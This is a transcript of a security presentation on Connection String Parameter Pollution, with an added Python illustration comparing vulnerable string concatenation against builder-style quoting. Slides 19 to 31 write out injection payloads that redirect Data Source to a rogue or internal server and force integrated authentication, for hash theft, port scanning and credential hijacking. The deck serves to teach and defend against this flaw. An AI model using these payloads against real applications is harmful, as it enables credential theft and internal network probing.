Chema Alonso, Informática 64: Connection String Parameter Pollution (PowerPoint PPT Presentation)



SLIDE 1

Chema Alonso, Informática 64

SLIDE 2

Connection Strings

  • Define the way an application connects to a data repository
  • There are connection strings for:
    – Relational databases (MSSQL, Oracle, MySQL, …)
    – LDAP directories
    – Files
    – Etc.

SLIDE 3

Database Connection Strings

Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword;

SLIDE 4

Google Hacking

SLIDE 5

Google Hacking

SLIDE 6

UDL (Universal Data Link) Files

A .udl file stores a complete OLE DB connection string, password included, in clear text; that is what makes exposed .udl files worth searching for.

SLIDE 7

Credentials

Database credentials (SQL login):
  Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;

Operating system accounts (Windows authentication):
  Data Source = myServerAddress; Initial Catalog = myDataBase; Integrated Security = SSPI/True/Yes;

SLIDE 8

Users authenticated by the Web App

The web application manages the login process:

1. The web application connects to the database using its own credentials (one fixed login in syslogins, written in the connection string).
2. It asks the user for login information.
3. It checks that information against a custom users table (Select id from users).

Diagram: app running on the web server → connection string → database engine.

SLIDE 9

Users authenticated by the Database

The database engine manages the login process:

1. The web application asks the user for credentials.
2. A connection string is composed with those credentials to connect to the database (each user is a login in syslogins).
3. Roles and permissions are limited to those of the user placed in the connection string.

Diagram: app running on the web server → connection string → database engine.

SLIDE 10

Connection String Attacks

  • It is possible to inject parameters into connection strings, using the semicolon as separator:

Data Source = myServerAddress; Initial Catalog = myDataBase; Integrated Security = NO; User Id = myUsername; Password = myPassword; Encryption = Off;

SLIDE 11

ConnectionStringBuilder

  • Available since .NET Framework 2.0
  • Builds connection strings from individual parameters, quoting each value
  • Injecting into the connection string is not possible, provided user input is assigned to individual properties and never to the ConnectionString property as a whole string
SLIDE 12

Are people aware of this?

SLIDE 13

Connection String Parameter Pollution

  • The goal is to inject parameters into the connection string, whether they already exist in it or not
  • If a parameter is duplicated, the last value wins
  • This behavior allows an attacker to rewrite the connection string completely, and therefore to manipulate how the application works and how it authenticates

SLIDE 14

Pollutionable Behavior

Connection string: Param1=Value A; Param2=Value B; Param1=Value C; Param2=Value D

DBConnection object: Param1 = Value C, Param2 = Value D

SLIDE 15

What can be done with CSPP? Rewrite a parameter

Connection string: Data Source=DB1; UID=sa; Data Source=DB2; password=Pwnd!

DBConnection object: DataSource = DB2, UID = sa, password = Pwnd!

SLIDE 16

Scanning the DMZ

Diagram: Internet → FW → Web app vulnerable to CSPP → (Data Source) Production Database. Also reachable from the web app: Development Database 1, Financial Database, Test Database, Forgotten Database.

SLIDE 17

Port Scanning a Server

Diagram: Internet → FW → Web app vulnerable to CSPP → Data Source = DB1,80 / DB1,21 / DB1,25 / DB1,1445 → Production Database Server.

SLIDE 18

What can be done with CSPP? Add a parameter

Connection string: Data Source=DB1; UID=sa; Integrated Security=True; password=Pwnd!

DBConnection object: DataSource = DB1, UID = sa, Integrated Security = True, password = Pwnd!

SLIDE 19

CSPP Attack 1: Hash stealing

1. Run a rogue SQL server on an accessible IP address (Rogue_Server).
2. Activate a sniffer to catch the login process (Cain/Wireshark).
3. Duplicate the Data Source parameter: Data_Source=Rogue_Server
4. Force Windows integrated authentication: Integrated Security=true

The web server then authenticates to the rogue server with its own Windows account, so the challenge/response captured by the sniffer can be cracked offline. The attack only works if the web server is allowed to open an outbound connection to the rogue server.

SLIDE 20

CSPP Attack 1: Hash stealing

Connection string as the application builds it (user input concatenated without quoting):
"Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=" + User_Value + "; Password=" + Password_Value + ";"

Result with User_Value = ;Data Source=Rogue_Server and Password_Value = ;Integrated Security=True
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Rogue_Server; Password=;Integrated Security=True;

SLIDE 21

CSPP 1: ASP.NET Enterprise Manager

SLIDE 22

CSPP Attack 2: Port Scanning

1. Duplicate the Data Source parameter, setting in it the target server and the target port to be scanned: Data_Source=Target_Server,Target_Port
2. Check the error message returned by the provider:
   – No TCP connection (connection refused) → port is closed (a firewalled port that silently drops packets usually shows up as a timeout instead)
   – TCP connection but no SQL Server (pre-login handshake failure or timeout) → port is open, another service is listening there
   – SQL Server answers with an invalid password / login failed error → a SQL Server instance is listening on that port

SLIDE 23

CSPP Attack 2: Port Scanning

Connection string as the application builds it:
"Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=" + User_Value + "; Password=" + Password_Value + ";"

Result with User_Value = ;Data Source=Target_Server,Target_Port and Password_Value = ;Integrated Security=True
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server,Target_Port; Password=;Integrated Security=True;

SLIDE 24

CSPP 2: myLittleAdmin

Port is opened

SLIDE 25

CSPP 2: myLittleAdmin

Port is closed

SLIDE 26

CSPP Attack 3: Hijacking Web Credentials

1. Duplicate the Data Source parameter, pointing it at the target SQL Server: Data_Source=Target_Server
2. Force Windows authentication: Integrated Security=true
3. The application pool in which the web app is running will send its own credentials in order to log in to the database engine, so the attacker obtains whatever access that account has on the target server without knowing any password.

SLIDE 27

CSPP Attack 3: Hijacking Web Credentials

Connection string as the application builds it:
"Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=" + User_Value + "; Password=" + Password_Value + ";"

Result with User_Value = ;Data Source=Target_Server and Password_Value = ;Integrated Security=true
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server; Password=;Integrated Security=true;

SLIDE 28

CSPP Attack 3: Web Data Administrator

SLIDE 29

CSPP Attack 3: myLittleAdmin/myLittleBackup

SLIDE 30

CSPP Attack 3: ASP.NET Enterprise Manager

SLIDE 31

Other Databases

  • MySQL
    – Does not support integrated security
    – It is still possible to manipulate the behavior of the web application:
      • Port scanning
      • Connecting to internal/testing/development databases
  • Oracle supports integrated (OS) authentication on Windows and UNIX/Linux servers
    – It is possible to perform all the described attacks:
      • Hash stealing
      • Port scanning
      • Hijacking web credentials
    – It is also possible to elevate a connection to sysdba (e.g. by injecting ODP.NET's DBA Privilege=SYSDBA parameter) in order to shut down / start up an instance

SLIDE 32

SLIDE 33

myLittleAdmin/myLittleBackup

myLittleTools released a security advisory and a patch about this.

SLIDE 34

ASP.NET Enterprise Manager

  • ASP.NET Enterprise Manager is "abandoned", but it is still used in a lot of web control panels.
  • Fix the code yourself.

SLIDE 36

ASP.NET Web Data Administrator

ASP.NET Web Data Administrator is secure in the version published on the CodePlex web site, but not on the Microsoft web site, where an insecure old version is still published.

SLIDE 37

Countermeasures

  • Harden your firewall
    – Outbound connections: the web server should not be able to open connections to arbitrary hosts (attack 1 needs it to reach the rogue server, attack 2 needs it to reach internal ports)
  • Harden your internal accounts
    – Web application
    – Web server
    – Database engine
  • Use ConnectionStringBuilder
  • Filter the semicolon (;). Blacklisting keyword names is not a substitute: SqlClient accepts synonyms such as Server, Addr, UID, Pwd and Trusted_Connection, so only removing the separator keeps user input from opening a new parameter.
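The following is an added example, not code from the deck, from Informática 64 or from .NET. It models the two SqlClient behaviours that slides 13 to 18 rely on (duplicate keyword: last value wins; keyword synonyms) in a small parser, then runs the three payloads from slides 20, 23 and 27 through a slide-20 style concatenation and through a builder-style construction that quotes every value, which is what the ConnectionStringBuilder countermeasure on this slide amounts to. The quoting rule is a simplified version of what DbConnectionStringBuilder does, the function names (`parse`, `build_vulnerable`, `build_safe`, `quote_value`, `reject_separator`, `effective_target`) are hypothetical, and port 1433 stands in for the deck's Target_Port.

```python
"""Model of ADO.NET connection-string handling, to show CSPP and its fix.

Added illustration, not code from the deck or from .NET. Documented
SqlConnection rules it implements: 'keyword=value' pairs separated by ';',
keywords case-insensitive with synonyms (Server == Data Source, UID == User ID,
Pwd == Password, Trusted_Connection == Integrated Security), and the LAST
occurrence of a keyword wins. Quoting is simplified: a value in double quotes
may contain ';', and an embedded '"' is written as '""'.
"""

# Keyword synonyms SqlClient accepts, mapped to one canonical keyword.
_SYNONYMS = {
    "server": "data source", "address": "data source", "addr": "data source",
    "network address": "data source", "database": "initial catalog",
    "uid": "user id", "user": "user id", "pwd": "password",
    "trusted_connection": "integrated security",
}

def canonical(keyword):
    """Normalise case and whitespace, then resolve synonyms."""
    k = " ".join(keyword.strip().lower().split())
    return _SYNONYMS.get(k, k)

def parse(conn_str):
    """Return {canonical keyword: value}; a later duplicate overwrites an earlier one."""
    result, i, n = {}, 0, len(conn_str)
    while i < n:
        while i < n and conn_str[i] in "; ":          # skip padding / empty pairs
            i += 1
        eq = conn_str.find("=", i)
        if i >= n or eq == -1:
            break
        key, i = conn_str[i:eq], eq + 1
        while i < n and conn_str[i] == " ":
            i += 1
        if i < n and conn_str[i] == '"':              # quoted value
            i, buf = i + 1, []
            while i < n:
                if conn_str[i] == '"':
                    if conn_str[i + 1:i + 2] == '"':  # '""' is a literal quote
                        buf.append('"')
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(conn_str[i])
                i += 1
            value, semi = "".join(buf), conn_str.find(";", i)
        else:                                         # unquoted: runs to next ';'
            semi = conn_str.find(";", i)
            value = conn_str[i:n if semi == -1 else semi].strip()
        i = n if semi == -1 else semi + 1
        result[canonical(key)] = value
    return result

# Slide-20 style template (constructed to mirror the deck): input pasted in unquoted.
TEMPLATE = ("Data Source=SQL2005; Initial Catalog=db1; Integrated Security=no; "
            "User ID={user}; Password={password};")

def build_vulnerable(user, password):
    """String concatenation: whatever the user types becomes part of the grammar."""
    return TEMPLATE.format(user=user, password=password)

def quote_value(value):
    """Simplified DbConnectionStringBuilder quoting: values holding ';', a quote
    or outer whitespace are wrapped in double quotes, embedded '"' doubled."""
    if value and (any(c in value for c in ";\"'") or value != value.strip()):
        return '"' + value.replace('"', '""') + '"'
    return value

def build_safe(user, password):
    """Builder-style construction: every value passes through quote_value()."""
    pairs = [("Data Source", "SQL2005"), ("Initial Catalog", "db1"),
             ("Integrated Security", "no"), ("User ID", user), ("Password", password)]
    return ";".join(f"{k}={quote_value(v)}" for k, v in pairs)

def reject_separator(value):
    """The deck's last countermeasure: refuse input that could open a new pair."""
    if ";" in value:
        raise ValueError("connection-string separator in user input")
    return value

# The three CSPP payloads from slides 20, 23 and 27: the user id carries the
# duplicate Data Source, the password carries the forced Windows authentication.
# Port 1433 is an assumption standing in for Target_Port.
PAYLOADS = {
    "hash stealing": (";Data Source=Rogue_Server", ";Integrated Security=True"),
    "port scanning": (";Data Source=Target_Server,1433", ";Integrated Security=True"),
    "credential hijack": (";Data Source=Target_Server", ";Integrated Security=true"),
}

def effective_target(builder, user, password):
    """(Data Source, Integrated Security) the DBConnection object would really use."""
    parsed = parse(builder(user, password))
    return parsed.get("data source"), parsed.get("integrated security")

if __name__ == "__main__":
    for name, (u, p) in PAYLOADS.items():
        print(f"{name:17} concat -> {effective_target(build_vulnerable, u, p)}"
              f"  builder -> {effective_target(build_safe, u, p)}")
```

With concatenation every payload ends up connecting to the attacker's host with Windows authentication; with the builder the same input is stored verbatim as the User ID and Password values and the original Data Source and Integrated Security=no survive. The synonym table is why a keyword blacklist is weak: `Server=` and `Trusted_Connection=` land on the same properties as `Data Source=` and `Integrated Security=`.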
SLIDE 38

Questions?

Contact: Chema Alonso, chema@informatica64.com, http://www.informatica64.com, http://elladodelmal.blogspot.com; Palako, palakko@lateatral.com

Authors: Chema Alonso, Manuel Fernández "The Sur", Alejandro Martín Bailón, Antonio Guzmán